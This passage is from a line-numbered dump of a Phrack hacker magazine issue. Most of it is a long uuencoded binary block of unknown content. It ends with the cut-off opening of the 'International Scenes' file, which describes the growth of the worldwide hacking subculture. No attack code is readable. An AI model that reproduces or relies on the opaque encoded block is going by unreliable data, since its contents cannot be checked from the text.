  18067. MV*)(EH*"I(!(B1%,KTIL%[P,%;BW6YD<;E=+SPBDEGF]"($]Q.FFM@$[66F+
  18068. MRG2XS!=UA232JW*.?.4BJC*&*SNV4357U$P-MN%2A>(@ )*FVL4T(A)5,@T2
  18069. MTODD\Z[:+NDM,_FT-)QKI>=-Q,WN2P+7F[JQZU'JX4UZ6L:^%"R[7$LJ#3&?
  18070. MHM[+ :T-SYK@1"I&&P'>I'2CQ,WH=F+*TI*R "E%84RBDX(92O%74AR6^(A&
  18071. MEX@W%:>U#/5<(.(S)F"GIFXA(O)6?7$=)NTNY2E)KY\+W6B]E,B+(9*-ME+I
  18072. M%3'9F>^+,D'_U(21= 5'MEA*2];YIM(LSRYN:)7=__+ES^.L:6!M.U>:L%TM
  18073. M0"+'6J'<#TJ>58(BG&0Q3#115(KWE:\\*[VDJ:3+ZR>F?G/2/ILA74T$.LJ;
  18074. M)&HWCD94'T^;A**QUII+7"I=_O)PL$C%#<1-KV(?TA9;TDF(PFR\(MTV\20N
  18075. M<U5U<8-9D]6K\JQH:DR[:F5R9*S"5"(M>]/O<11GS1\?2PZ4>A\16*.5RW%%
  18076. MU"G8F])#21L ^$YP&9V)M?KF*,!V;/C/,G,1DPN6J"B?VK,39SY78@V)64-\
  18077. MYZ&G2KZTDGFI_= [X6['KL4EM=L] :1;772FM+R7OO9EC2#\4X";/)FQ./%R
  18078. M"9[N9%7X_ >MJ'79L1R* O\8#O(7?3$]7 <BT:0B5.,57A$CE>0LO^)D;6!N
  18079. M(=43SV0CK544+<%6#901&]$$JB5<IF%S@X,3??4GK!<D=,5-N9$_=-4W?+-/
  18080. M]5$W6@( HT$F . 9,C4@+_5C.XAD?/84)S$>VZ +'.--CC(FV><E&<99=N2$
  18081. M]A$3Y/=O:[(3M:<ZJ\-@3Z1^*V=$4P%J"P(@2= "OZ06&R<SH]%(-0,7MC(A
  18082. M<!%RRM-4LY8TC1& 37-5@F$9>=%D+?<BV#,UU%42+-(5V6<^2D<"1#(EWA4)
  18083. M9<$2&4%>4I(^RT-VZ-%->S,XZ$%V%A4VY<--_B1A& .#?743*\$2@>,R @(6
  18084. M/NC_*5OH&39R$EMQ%#!Q$@"E&]:B$FO2+G3W2=CG3:>3.A4&BK5'4CUA%2E6
  18085. M3+SV(@D"7#-52[JD)/#5:K/"$6L1%S7S%K)5>(('&$FSC5VA0]H"2S!$.\PT
  18086. M$9)')'6P&']81;V23E\3-E*Q@W+P+(4A&VGU;$+7!E>$((W@$%W2=MIV$+5D
  18087. M46&6'D@G6&LF92$5./01+Q>!B+*3BG91'K+'!DT0(P+Q$H,Q.+<H0D&A0OM&
  18088. M3QP%'*,X=SI1>_(!*8=2 N17 B=F.UW1"&$GB>+C%$-U%DLB:3*V6[.R6&HA
  18089. M%1,G3*U&7$53%TQT@$P%&.'(=UPWAS8272^'%_^7/=%5_V6#P1KU X.Y85-;
  18090. M:%F1H#A8E@20& DQ]16K!B=70B9IF1YT(4=?I1ME(B_?]AN[L5TT$3BCJ!+W
  18091. MXE']=U,;TI>9!A8(@74H<!)>\QN"HQS*,3CTE#JX03H39F$8II+T\AZK8R@D
  18092. M\$-OY38TJ6DEHG>>214YE3=L,8URP18OYI,0T5075Y%R\1?'!$VK@A>@HEK>
  18093. MY5RU62SA"%6^1EW',A%>,SA[10 Y"!@ILAAX\A _YS-3HG*1X!1M@&90)XNR
  18094. M"  IU@B#IB90!X,$L!E[0X7SPB^"0U!WEW=-9)[FB90IP 0V8F87L5$7!B;Q
  18095. M"3;>E&U>4A_QHFA@4D(CQ5W"P?]8C_,4*\.#??%4CB )[9<IHD8G!!8\5R$S
  18096. M=P81RZ@\/',1'7)3O")Y79=I);8C-")#?!$M7&.!#D(U*](8O3)V;6!F 40 
  18097. MT9&,S@(M'L%Z/;&,UE08<3$3-J<E,+B608AFM+$EUC(F(N5'EX@3ZH)AZH$ 
  18098. M'K@5RM,$-]4IGY8I@X%97 )P(5,R'-5OWS=A)9AA?41^CW(M(\,2-946/^0V
  18099. MCF!;1_5:,-0T/!5T=Y4K:C$79TJ:V6@T'3*4/(@8O-9_G1)%9M4BA2$8UG.4
  18100. M4$1=5:,7D7$79M:+)1" ,16C1X)*)# 28&& ,J6B81.<MA$O(9 ?^!900:HE
  18101. M].0HUV;_-Z7$G;;Q5>K"&RK9HBGPDYTRJUL1$5&0%B2!62)4;OT9$X86,G9T
  18102. M']VG87NT=I &'$/J)WJ&IN[V5NE#:=%:$D\$1Z7A./>W?S#6DQUB*]8(%A#!
  18103. M!-(8<8%FCDEYBB,"79:01$52+)%1'BRW>4L$&EW%J6A" *D5&-VC9#UG$"C0
  18104. M*0925C'%:U;!J1N);;]Q5]!Y)=42+RW(0?:Q$\?!F(XY'T*J0F4!<43SDS=I
  18105. M%Y@E./JY5Z/H=KXHGA\90FYGF2E$2B"4+T0"3!"!'1?BK*,AK:NEFQ,B:G-R
  18106. M$;H3C6J!FATB!45$>',1KA!A(EO(1"[#:^"X(X5A%\Y$5C(J_Y&'T2P-."+%
  18107. M9X+SH1(YI"V380L0L1)V,8"P=#D1D4+VZDT7DTKFD5E$BDD\$7ZU,5([$4CW
  18108. MXD>[P5W?&@=.4*L1$1V=LJMTE&VH$Y^Z*#I4"'SW44HJQ)*;)4@ML0O1]PVK
  18109. MQC.C&99UTE1'NWJJME@&$6DJI4B])!</D09%VR!F(0=%A6>[(BP+""*>N:';
  18110. MPTQ05!0M=R-\JBU<9!E:!#O6,9#EAD1CPT7SV%68@A=%H7XXQ3ENF1+;Q9\E
  18111. M47KI41L7@R9/)XL[FG9,Z&\?=4J;.:Y%4V:0Z@;GD5]XV[S9=Q.$IKC]!K?T
  18112. ML6ASVR@I9)\G@1<@ 8ETQDZD04P.XO\56.2SC?-A:W%CI2G ,^9Q0N.]#>)4
  18113. MR44[)H*OOM9,LJ!:>[$]M@N"?H%-#5@)5L1%>H5F,9$>%^$@W:,8):RNPJ5^
  18114. M5J2#%5.7*O1!*E)!&F4^74*J:=*^'+6C)CA2M(&+M#(A7%$6"1$1O!%/MH%?
  18115. M8$.2)>-V-D%8 #<RC"(R"Q$Z)]L2BQ%'9IDW%>(V*?8IS_.Z9"%I C%JBU6:
  18116. MTZ@IJHM><1$1=V931ZM^J_)J(7*!/.)*Z9B.A=&_*+)Y+)(]7PN=VF4;T5&4
  18117. M)9& %.%%5(("6C2./'9EY^%>T_LG&W(>&34X$MM>8+4N,)$_BFD<<6DMYENF
  18118. M3># IO$:_87_21T42.ZK,>PKLG@[$[SZN%Q2*99I0G[4HN1"N6*1-S]34YW6
  18119. M%6Y0>521'Y+&4[STA@PR>,5DC#PE6YUGAR=R("2A-"+&/1^Z51Q\1<]3(TZY
  18120. M>1 X,4V07YG$$P[2"!.A&%ND"X4A$,DB3F0Y.V9FI?,1PCEG"1Y;.O,D$_@I
  18121. M4*=CB)Q<1VVF*)X!CS@5'5"RO&12$\!::"6T1X/DD8#$2;E8N&"C'W&Y="G0
  18122. MDK)T0[ZD)+F"(857-%Q\3J-9%JR6>,&S<1IR*R?F-F8!*DTT:P[GE^5<E7Q1
  18123. M(\O2FZN%O%R!3=$U$2X".W5!;#K*&P.-(I8 .]#B178QEM:43;&D_S<-&X.D
  18124. M1 (3L:)A)+B6W$=YR1+ RI$FU&_UU8M>(KX($BZ2MJ/2>Y_W4X*B5$))W,H,
  18125. M?;CT4='".D*'N(]-L23 9"?3*"4;A[I-1%O>(L 107@Z>4^&K=A"HZ?3N!5A
  18126. MATPC1Q<C$565-BQ.S<U6=8Z\J63DF([<I%_RK)I$IABP SNU (#28D66Q2)E
  18127. MV4V^)R_R\HJIVP23;&[!ZBB^ <*:3%!B'<^_0;?R83(VE3AZ-++]!"3YV2A@
  18128. M8Y^HLV]I"2E(["74<3H@W(@DH,)E&4<A=Q;36,RHJZY?L6)9[%MT"F,FW7&U
  18129. M8I.*M''%A%3)Q"M-0Q*XF7EZ$0D0B"Q3=/]5DI&.S:0C#(&6Y19G/S89BI$+
  18130. MOS8[MB#!SX(G1>$4WQ:=(XF)/IH_2FBQ^VS7R'%].UI*P$='^-S)9>H[E<*B
  18131. M_ 0ISSV*GO2XS>W<2XQ";5TIP$%U[/%*FEH\-79CWYV*("()'.A3.=Z@O,38
  18132. MQ?.L<T$T\)V,\-B4G6U5>Y$8P+;3E4"U6J,81#880WV8+Q$= T@8E401!VY%
  18133. MBE$86:/@*\)6:-F"+7$<1="2UPDX$JT;I6C=I7.9%@84M[BX@@/"I4DRCRDO
  18134. M< U2GK6$1UJ2BRO<,C$40N&+<$<"XN0P  @A*J9BQ30KM/1#GF9R>2,0ZNE;
  18135. M;9&9@'WC,U6Z4F+_%B/AP*\5/8-<8B<JY>H*76->CGP:(]'%9# *$;9]&[+:
  18136. M!B("Z[I06=CT4EZ^10E8%5?"+W>)G[=C[.HR)N;SJZ3S@G9#=Q"]A*CZ4:FL
  18137. M5QC!G2Y!0)O\4<_]BRHTN%RZ=IR%0@?4JM92'Y80"ZVD<JD8S9H*,W9JV/XG
  18138. M!VGQ83E35*T&H"Y9C4>D=TW!1*#R1(+G"-333+%T5;([/4<9&";*3"AJ-DU@
  18139. M;A&N)0,XY4:B"Y6P\24Z&94%(V9C'@'DR;E=F$U0!"E0B?$!2'>;E4>,;?(\
  18140. M3S'/D1IEB.H;XYZJF!X9Z%)&Z/,9U]B7;2R10C7A(\)Z*#0!%"KB,,W)_V?,
  18141. M,SL(.DMGV@0&8J!/Y!DIG_*A:]Z/ Z#+..D7MW&WXX//DWY\AJ\C4A2W)J,B
  18142. MPCU'3:#SK2)3X]^Q+A01CDF1,R,/J-0Q4L(-:*@JDLZ5\&5YCGVIX35UT["5
  18143. M;)<K.#J&%A]9XC\CB:7[S)])?'V:;,HCDY]([)'[!N@LWV^661.U$>U5+4YW
  18144. MH7)AIW"M_2GY-!K&N(-ND/4" 25J?!9U HU" [Z,7:%&[B#1+#LR^9.OI8C#
  18145. M?X$LPL<(>(=0XW*$RIX'#8/'@1V7<RPQ CL''J,J8L(Y\NNVX!)1MC&\04\;
  18146. M0P).T;!\Q?-UPQ.F*I?N%?X/&_/M@B:(]JJDJ/_GZNX9D]_$>LZ+20P0*4B4
  18147. M(#"0 ,$2* :B*$&B($*&#PL6&#A05B1;DC)&DL0QDB./'3O*<=.DC4F3;=I$
  18148. M<B-)99(D*(HD00*S21(W)]LD.9FD29J?*%6JC.,FSE F*H6ZC"2G*<<XDN+$
  18149. MD=-&3IRFE2Q)VEI)DM>0D2QQK*71JR1)3CO:LF7)5B5;46NYM743  $ #O6F
  18150. M0+&5*D>M<VWIJO764F&QM3 &UJ4+!8J[=PD4)%&Y8=XT;08" $&B,P@"H$.0
  18151. M"$ B;^G0)0 0)$%1=<42!4!0S+NZ8 @"N%FWKE@0;XG9#D$PA*FW(>^&R2TS
  18152. M%'C<M6_6#0_RYIV 1//_W)-Y0^>*D6-'-TU=HLVX-9+.E$3#'W6# J;[%$F2
  18153. MIDS/4VAZH4-W @6:\FK5IZ)JJI&CBA(O$J\2' FPCF3Q*J..0OK*+8RZX\HM
  18154. M2U3R+:_L4D!BJDK$"LR6PBII#"ZM0K1$*[;<TJ4F %:S3$;3:HR/IA@O:X@B
  18155. M[:9SB$?A:/NQ1M]*HX@$W"KR3#;I@NM,+],0N@XVZJ*;3KF"FE.(RBHI.X@R
  18156. MU@3Z+:\"="-!DE@DD<4\EW)J0Y)&V&S*JC9R,HK..!QY*8F!4B#B)I[T"W0G
  18157. MGNQK(J>BAKI/)Z)6DH/ !:5RZC^QMD)33I$XLB3-L=K*="SRM!)K5%WBBJ.R
  18158. M_QA!@_(DJ3J::ZY<V*J%L+>^^LK!PTIM(XX82>.M-B@;@@FO'@LR<K;)CB2 
  18159. MHB,=.HXU)BL[Z"[6 &C6M-% 0 @Z9ZE4[EO+JMQ..;Y@\O"](ABBDEG+M$NR
  18160. M(K0BX2@6EE1"M"6O+(E*T4:J<B1/JE0J@H0DBD!BID)/R@G0FX+2C[XZE0)J
  18161. MIY2,:A7@CMXLZJBT%%RQ.[487''-C<:28T*XMC(YW[DBB2_&@O)RZ.&5*G%P
  18162. M,,'>>FLQMW*.HQ$./Z-R-,\(2,+#%&*4[4LH1POM2 Y9ZS&X95M[4KKC5I/9
  18163. M-[VR<VBT9[U-;L=P7:OH:)AHNNFD)E*""0DD2"#BN/_*"D@MK]%D_ ZMM/JE
  18164. M\U^^[8#JT8!W#0_.GOPDKJ:=!-4)*)_RRZFJH]A&SZ2IC.HWDJCV/8IPC]I2
  18165. MD/.L.D8K04L%U(@K6>:ZN"U++($IQ[MP(T IW)L@'2,2:4VPK%'9TLHT$&2\
  18166. M#,IF2RANHAH[*XVW(]EEWDCDQC765R!_K1%(#L--2#G+5$WN2O=\LL^^W-O(
  18167. MC*<TTE97N;RPY@W-3#,FZJKZI3+*C48Z JDJ.="$)O%!0GS2HY^=, $F;$!?
  18168. M$PJ$0)7T1S]7><JD."<5 EEP*V7)"%A:)19;64(6; 'AJ.BRE;CP+79LX1.Q
  18169. M#%*90?V$"6UCPTFFHK.W)*C_5G"9BR4<TBOC/"DT+RQ!?-K0*[+5S5E>F\[S
  18170. M8N:0'B&':Z%A&O-H,QUVL8LZU.%1=AKBI_R$$8)#R4Q-#*:<X%CM61T9RT7 
  18171. MPY)&' XMH.H<5>SHE#W%AR'N42!Z<)<PGXQQC#]17WI8<DB0H*5?5-G<Z;B2
  18172. M( LZ14!=\518'&26>+%1%M:H2QI2)3/0M.]G20 *$B@V,96L"'8@S!==2  9
  18173. MR>P&.!51565N(JU:/@])T&%BC1"B+6!>9B)XV8YI?,,U*.KE2>$:"-@\ YS+
  18174. MG*MMZ&(3P3;4,#/MBV!-8C(P@H &.%6CB*U*N""UC,52;#*GI$Z" J0A
  18175. M#2;\_[%7[I!@$E.BY"@.1!3NYG,_ H5G4I#:E56F(I6NK DM!XT*&V\EB;)X
  18176. MI:$H)%E(2&:+V=7F>![Z2MN"4DV03M.!\HI=@FZFB^5QC2!D4J*UVJ6MZ?!R
  18177. M6E)3#4(D R65/E%J7 S7:CJ3F^I!DVO,FHQV/$K-B1T0@FC()G]HDJYE2@DV
  18178. M(BF9>**23JYPI7.M\DM/^*0\$J3+?(S*W?F.JL^"WB>0@=R5I#@WJ:WNRSP*
  18179. M7=-WZ)3)DJJLA"1:85GX9C.WU"E& 9@-: C $(X,I9J,4JI5(I&FLD36%BKY
  18180. M9-'(%@!B'@<UNWE(E)1(D"2IE$C)494S;X-3O<3O:][:CO\XIX@JH^5SFX]3
  18181. M"1O2H$WU,:I0:'A;V+3US-_BE6\#"MF%.G>RDU7B9%0Y&A'T6(3X(*P-:FB#
  18182. M$R+6N*",58Q50<E9"_HSK*SG(Y_[G*;4":JG./9DH&I+6RJXPDI]Q;QL40FJ
  18183. M\%:9SFSJ48T59!MB=TFZ<*177B)2NY;X0L]4IFNZ!!.2EA2^)NT2OPZ.7]#@
  18184. M)V'I2,O 3RNP0QAWDAKF-@FV+60V:WM-4Z9!@0=3\(.Q5 *'AL0JK9*#)9RB
  18185. M,I7%P5*5R E\^ 1=))3@G@E3E$Y\DM3OWBD.]S$E^C06R:8PU"639*4M)B65
  18186. M7<FAE;$3RXT]LL+#=*=3_L/O77[_:II,UM;$*FG$&.6E%8BZ97BF,7,X.\L\
  18187. M#5=$B\>Q8M>$,T3*(%B<W:+,;PLBFM/&[R#C*V85NY4>QB4%=R16:AKNV;ZG
  18188. M=H9H5%22"OF&Y;]@5:*M$LE(BB-D/\5'>?=46.X:1A.R^K&@%+.<#7\&:CAU
  18189. M#E*3!+!'.'>XT&VJO5"9T*9B9RLVME=VJM%6A4GPIJ] \('G68E^;!&+3F&D
  18190. M%O8USDQ]-*U&'_@Y09*6E)35O2^1C5K&_-IDH"61WDAIF-#J&@#2QVJ3U##?
  18191. M$61@34R)A/8Y-\&_!5\)OG-.JY8:SN912U9S$I\I%9%@Y4.@FZYIGXFY:2B5
  18192. MD[5)HM"&_\TYY2,7)-"_( 683M%QRFT]+XMT3)7S4L@\YV5A$H@EL[NH)+$<
  18193. MAR"U9VU.MK"%!$@ (C%1A5_9*$FU*^U-N2FSM#P_#VRN515%TGBD#&.V-<Q+
  18194. M]X']'%,"F,0G##0)$R;FY .2TIM)(,+ %5S+AHA$%J4&;_^^S$;5Q54.!>Q3
  18195. MNJ!K,+0K:JUDQ9S&\=.&I)AR5^#]UR&?,B#5D>?@5T%4.G$\7#BG*';ZXKPE
  18196. M&E,7/A7 S$.D"0E+3""0[XI J]<Y&\7"EO;U"IB;J<SS=-2;*VE'JA,1I[4*
  18197. MBV&?[@B81RI-L]M=>R5^>S= DIIVSM4X!JHD*4E!0Q.:;.DD5/]?[7&CFVV2
  18198. M(S.1>'"\>G+](^-UE:Y@^28-29?$QPI!ZQ9R\!!TT\(H)E*C>,2Q3[D3@.)U
  18199. MWL'Y./S1,@PYC!4Y&8Y0ME'ICJ#3!:,HJKN0EH$A(9= H)\I*&I[H$QA"[N(
  18200. MC&*R/=5RL(,XLZ9+-T4+K=[ C2>QNN,QOMA0(V-Y");J.JN1#1[),(<0B)M0
  18201. M(+&SIL91'[-3'_[@+>7Y/A'4"]?@B+GC"+\YCWV9(TWA/XXX&;%KKA1 -3Z!
  18202. M"4%J&_YPF'H:H\SH0<RYJTCHET8XI$>QH*P2(?/H/X-:0ZW0*QN+0Z[PE*A0
  18203. M&0KD-ADI"+: *+9JE/-PP@ILJV"CK%[_.8V*V,/7N$$\Z[,7:A8F 2K22CH>
  18204. MT0UWHR+# @Y*'#1%C"GC0$)"(R.S:P+>0KS;8A]"4A_VJ0DNH;U:8J,TP:"-
  18205. M$2@)(:ZM@@H/D3BP.AIN&I0O# K(B34[B1@Q% H R;+C8HF-^1=;,"$Z<D.$
  18206. MBD/1X;+TRY<)82,PDX2CB1%@<8BO:(N-TP_VJ+O*D9>U:,9(.,3NDQH2/+06
  18207. MDSH9]!5GZ9X_@SL.^Y5Q(AO;V3I^C*F=PJ(#XS-[^R,0DS\96A^G2IO/2 V&
  18208. M5(Y,\HCP6 E@ZPH+RA-BBXJ:4 B!N$*9\)"*::R&43$Q.CR?R*>4L"/-^0O[
  18209. MN;4[9)U\,9R"_T+ K@"SN\,0.).$.K@096L;;MR0,SF=6=N8E<"*OWB3UO,U
  18210. MMN ,=<R+SMB6PI*2TG@>9@$-=G&BFN(E=@0M*B*(2C1!WHA*@_@61U.6;GNV
  18211. MQE&Q7@2X)EN;'A2@K^(,O/B]AIB-[Y@[OE$)RFFHO=D8_$FL2# 7CDR(F+")
  18212. MLS**[HJ<P$NK/^+",3R*MR(=IR 0.,**":F4.9G%@P(+3RD+&_LRV/D8'6.1
  18213. M4CF*R<@1.IL*L=B7@L*R#Y(*SGF30"0/6[ OITD2U*":>92>UV":YJNBYDLF
  18214. MLCR>&>PV5>$]KN.S<&.:F<FF!F*JB;DFM&P#M4R;EWH6ACP34,D4RO^1H]'!
  18215. MBD?YH*@PB;#J2.A"&RVL$P>J+O00(+:,M;):K"1XH+_HG"@SBJFX,=?3KT09
  18216. M1VR\F6S3R91)S3G2&5WH"/N"0)B@$/T!+_IL38UI3;8HH %308K8QZKAFAF4
  18217. MMR31S:+:NJJKD=L<MRBYFXH@&JDB&P[=*;LA@1ZLON>T+;2T+4 B19_P#+AT
  18218. M+2)J$/1ZHY5PJ$Q9#_2J"I70$K]S#Q0HS+99LI[PJ#]L@X]SH/2,@R9#/'%T
  18219. M0I&S(#SYOSFZ&(.J"H?*%_=2)\$H0(1ZO5+1"A0@NJ Y+!00GHZXQ9.3%Y&K
  18220. MMO-H$(SR)-M(OJ^,F7!BESRU1%]!--Y00>W_81[; (W@ )+GV%!$U<H]9*:R
  18221. MM(SJ<]'H [@FP*VSS"UN2H,F\<DI^A3MK"# @*O6G,^=@(_K*)>TX8G*213+
  18222. M&3'YP!T($HH9<K)=:3Q'R9CY=(1K! L[<*<LU;%*Z:&SR!==\+Q1$U:Z:(LD
  18223. M:('("+02F$FBO"#4;,T+(IUS7 EUI QT@REW^\1B"DO>Y) OX26Y)+BA:BT%
  18224. MV]!NR; L@IX?(8!R:9M[*KO9DH_LVXE*;0/>$J!>":UM,3B] AEJC3&1R,FH
  18225. M (NK\"IO(H*W28&,$XJ/4XJ0G":=^+B/JYR;6*SY*) "<<T/TIB<#"$+L:,G
  18226. M$P]K5)D>XJOV@J1\_X$+7:@OU; 68L$*MX"RD9#,[S(<)S1'2X"9=*4-',P6
  18227. MJTL>>2R:T/H]YWDPY",TW"!4[UN6X_P2/_4S**D,;YK2*>6)%"LQ,KH)R)DP
  18228. MN-S-SA +;/..2&$0 37'!<0*MA&@CJP)C_1%P\.NM@D4GD.@I BD]/A8RKQ,
  18229. MH_A.$$(VE=P8_0$A54H92CHA4?F4H).7 RT> * *]ZK([]K._8PRJ#B,TAS.
  18230. M0O.:JP43H:DI#:,>Y0RTX@,JF )%( $3;GFM= VTZW!8L[.T]DF#-&"J%),A
  18231. M(22EG^ MLW,/Y/DIL"$ <QJ+LL"*:[45A149[XR#DD2;--6CM#&)DK"AA?]I
  18232. M&.F46'%DK).H/HL%65&=,DBY,1TS)]3[+F6M%$V0LQ59(;BPLJ=H$-[9BIK 
  18233. M1+Q(I>;MG']1E =RK,6+A+FHC0CD&D!EVM -2P6KT!8KSC[U$N?0L)WJ&H+@
  18234. M.NU@OM/5L,>@B9JP--ZJ(51T3J!8K)H E*_"+RI*$O!S$+N,%V"KG[,X7P&A
  18235. M'(:1VV^R"2=SDVGR">WC+PC"N-RJIXQAPI\A'$?(28:K(#OBF*U:H:"#L]=K
  18236. M+UT(B98,.HRRN>(A'NMC"^5US9TML@*)I A-&IG1,#YUJ:F5CJ?[.D:L#>UP
  18237. M*3\KX.*4%M3H&DZ+W7;9#8*IU^Q+&*"@5*[]":[_E4X!BIOP<<??&HBS&-B<
  18238. M1:@Y<@K!D<GEHA@<9CND\:9KVI4Q/$SI=,\#LB:'28G7;*C.,8I_X4ZU6"[_
  18239. MP1,MJS'-@YT'B=\^U%P!:4"3B(S(X L*=,SU\-]PQ*."*A6^@!GLP5%N<;"?
  18240. M^BF:BD=@02;819[4.C!'O,%P!;=R&[JTJ8D54QM+TU>>J+Y.?AL!HKTA4M3.
  18241. M^-*%\IQ/ 17S[<R%;8(46#&^H%Z88 &1:A2A&#*Q<T][H54D0\ [D90,:BL?
  18242. MS3NI."YEU0C/RP4#E,;",(R#*S9=B8.B2I;*4*<H(TH:;A2BR""B;(M[@AG#
  18243. M<A8<7:V@8AJHL1(*':8\_T7$W8B:/V,ZEB*T;E$6/8Z/?J.)]F$@GLY7KMUI
  18244. MKAUG/GF[0QLB:;&0A[3/_*NQ2/C5JT(G-X@"M$F!^,A%JH8GF[A>!,)ALD,@
  18245. MD&P?E,!;QXHK^I2DAYS?6YS?]STA]_I&NLB4J>@4F!6+F)'C8S.9  G*Q9L*
  18246. MHMR543F* 3LZW_A0IZ6.S;K0"AX71/0B!:NPF +4@.VSW!-7A" "]P 4'M1G
  18247. MH(8U;6Z?/AJZ9XG U:6W\(L0 %*O4HN4O'L)ZS,?>#+2HZE7G; NZ[IG+:P8
  18248. M_="XL\,N#$1 2:(<"KI2Y9)3*FZ5G%2NGI&5DOI&%*D$8<6JMM"$2AAFR;@+
  18249. MJ?^@0,AL%,>$3;?%&.#AQC+F-.%PB,.&9JS[LQ<J5^D!163:&B)YK3HF&X"\
  18250. M:7\#6UBU706"5>GDCP[VMQ(0.,^@FN!0C@4D-OW0D^]0N;C"LA(6( *".!Q>
  18251. M&P2"' J7<(4Y/& 4BL#EG%"SJI#S-36<86(CBV4M%>#9O!6*I-#$$%N("* U
  18252. M2VHTIZFHTA!Q6\D,":4$@2=9W:)1L!2NP<9F[T7\T O^.B-?8Q56XQU1"/DN
  18253. M<H)955C+ONQJJB"4#\CQIC/:I7 BW44\D^*NI\#-)#4TWRAC&)J )^<JH""#
  18254. M-3^ZCX:Y9Z]6E"Z<F*EH0@$AG;\@[E89;CG!'QT[-JW_*)7!8%[A&8NG4*<)
  18255. MJ05->*7JQHLF8 *^(BF/X&N=LQ2H4!U5V@SC*9K":D@"\PT@ =@I6C[MH433
  18256. M6)K7B, (Q.!N.Z8)3K6LW8^?2+%-[>;;S6;E(*SL0!9J,9;Z*4,A50DX$0E2
  18257. M3HL*:I7#3)MRF3@<)CQ*OEM;I1DD:U*SEDBH (DL0VN%P\F+T;)'4K926<!L
  18258. M]/:_P!"T>!F8N8L$+0^,-H_%>]/Y'4IY$;H?,N/C:99YZY8-4U'KH:)R[=#7
  18259. MBI[>\-9T.P@F]W'E2%,.A@E CLZ?)J7\]B8NR9L^5>"P,+EAM(K^62[*:XI)
  18260. M&>Z%99M72HX"2G-9A1CKVT'O_Y)5(SL)5/+2\8 V-&S"BBQ3-BE*KEI66]"$
  18261. M%I%&O"XNJ(B$BCZF5YI&;#O;HX=A>?%.<RP,'"EC'T=XH_:SUS!"GUJ:->6L
  18262. M\=D6BO\2PS(221QU7KK:P2S)[VWM?>4/LUM5F3AXK\E'8K)!16J5_AT*_E&+
  18263. MAB*U^6W;2#")^)B,F!!,5NNX9S>?E*AM'98_0F:4BW%-/ *0JXB\YU[;6Y1K
  18264. M%F\OA:ZD;K>CMCFF#A4(%H>HS'\D2;](26<+!1+I/Z/06D*FJN\,F<FP!M,.
  18265. M"N:0T4BZ"SVSUI66/MN6<5&('2QDV[744ORWG<A:/O&3A@@!38/+T7A^RRBU
  18266. M,[RNI?\^I#OY%_SYBAK;T@S1#+H9NCU&"50*BE=K3^^-ORFWV +9GZO:*J,\
  18267. MZ$]I6Y"=)#:,7_?-""Y&J!GW.(-X9@)H"X"H96F@K4BV+-6292G2PDJ2(D&,
  18268. M]%!B)5MIF@  0*( "1 D/H+\&.!C"1($0IHL24)EB(\M3[8LH1%$"1 $7G8D
  18269. MH%+GR0(>.]9,R;-D@9,]>Y) D01)DB1,DC1ARB0-DS9HDK!)DR2-U:U,210!
  18270. M2_(CQY5"2]P\&<F-1(EQ'+6)VT;2W$AR[$J2$T?20SE\#UHJ**N-&R)H5Z(H
  18271. MHA3KQ39-'$-NVB;)Y"90Y3Z.^W@S5,I-W,21TR92Z+VF_8;_QBO)TL/6;1^:
  18272. MMBO15D6$@0\RM%3;DMS*8WG:-$L Q%];DFI)HKW:ML2'#E\SC&5I+P$ -@$<
  18273. MYEB]Y$F3)$(8/6SRI,;NW5MV-!N\.PB.-D-X#.H2J4;Q.E?>]TY@:=.G2]ND
  18274. M$6" 303HE597-146"40(UU)[(&!W'5$D3$0776W$T8@<C60HT5RCC=;:0JL!
  18275. M9HLM<422 A(@E8!""4BD !6!3<S8QE.66>:99HUEYMA%E$&51AQQQ>%&B*;!
  18276. MME8<*.[%$$4/C;@6=(%1:8LN!RF'FR0TII""4/I]61T!2YI824.R5&10194X
  18277. MV29$#]DBBRT?96223?%Y-Y)1WJ$W_U)0);7DTW \%=4>4F)Z!R9YWGFDT5@J
  18278. MA71?22JJ:-E33&&:!!I1I8&$5DPQB(12)"3QT7 I@23I2>U!9V%<D=1UEVNM
  18279. MT9I<<B9:XD@<*<A$0 $HD$!ICD_9"!F.G5GFV&9N/*:$LC\J2R1H;Z'8&F%+
  18280. M$BDK0TVZIFV3 PEDHBWA#K1M'$F)28"Z.@' $W[>Q:6+-0OAQB9M!R$721T5
  18281. MME60B25EY-%Z=]J9%@DCH4K2H(F:I1UX[.J'UF'AM2OQ>!)WE^J$(*G(G\>8
  18282. M>HI$&YY^NE01F); H)??V4F"1MB1AS&MI(%XE[86:B@1FGPY9!RN)YZ+0L8I
  18283. MC)H$"L9.YO\C@3<"65G2F_T(%1(TMA&%:*793-I=;8@&VES?4I3UDC<;9%NX
  18284. M%2ED25/JMKONGF]_9%-3NNAB22QLLJ:;)&;R[=Q$"S%DXDIU6ES41F#J]U),
  18285. M&G$TH78N>]?N1HQ'O+!1P7''XDDM9H[6??QERM15F':Z%!(GFYS8J$0,:O!.
  18286. MX*$57)-[N=H&AWVY)<FWQZTFG4.U\25<2<,OQD;3.^;HE%8X-@:9L4!2_5B1
  18287. M3,*F.]<81N%&%'CM&XD=>^M.UX97,W3<;>>7VU1&16W7_N$</9Y$"B9N*TD=
  18288. MI#%444$+ ;XW1/3:0GWMNL["VE4>1>7$5(V"'.2&<I3?>$10ASO B9YDXK+A
  18289. M/"YSPB.!J$#G022 ;"D% I7)D)"RE?SD)Y # $? ,[@2\ 4UNM-+^%ZS)!%1
  18290. M:2!YRULEA@0L=9F$:$23'XX<HZ/)-*4I-<I,CQZ#K,LT84@WY!:VBM0;&E;"
  18291. M+PZ1PW.DB*3<_$Q<!9$$"I"0$:.LRR22>]O$</4<*#EI(&9J2Y2@)!T.7>> 
  18292. M<$,<XN"V)T4YBB/829@%!V<2%S8N/-[)W)YB%+H/0I((29"D)$]W.I#8!%&7
  18293. (4U=[O!,0 #LY
  18294.  
  18295. end
  18296.                               ==Phrack Magazine==
  18297.  
  18298.                  Volume Four, Issue Forty-Four, File 26 of 27
  18299.  
  18300. ****************************************************************************
  18301.  
  18302.                              International Scenes
  18303.  
  18304. There was once a time when hackers were basically isolated.  It was
  18305. almost unheard of to run into hackers from countries other than the
  18306. United States.  Then in the mid 1980's thanks largely to the
  18307. existence of chat systems accessible through X.25 networks like
  18308. Altger, tchh and QSD, hackers world-wide began to run into each other.
  18309. They began to talk, trade information, and learn from each other.
  18310. Separate and diverse subcultures began to merge into one collective
  18311. scene and has brought us the hacking subculture we know today.  A
  18312. subculture that knows no borders, one whose denizens share the common goal
  18313. of liberating information from its corporate shackles.
  18314.  
  18315. With the incredible proliferation of the Internet around the globe, this
  18316. group is growing by leaps and bounds.  With this in mind, we want to help
